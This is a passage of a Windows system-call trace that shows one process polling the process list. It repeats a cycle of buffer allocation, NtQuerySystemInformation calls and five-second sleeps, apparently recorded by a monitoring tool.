ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.497] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.511] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.522] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.532] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.542] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.553] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.564] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.573] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.584] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.614] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.626] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.636] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.646] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.655] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.664] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.673] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.683] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.693] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.704] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.713] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 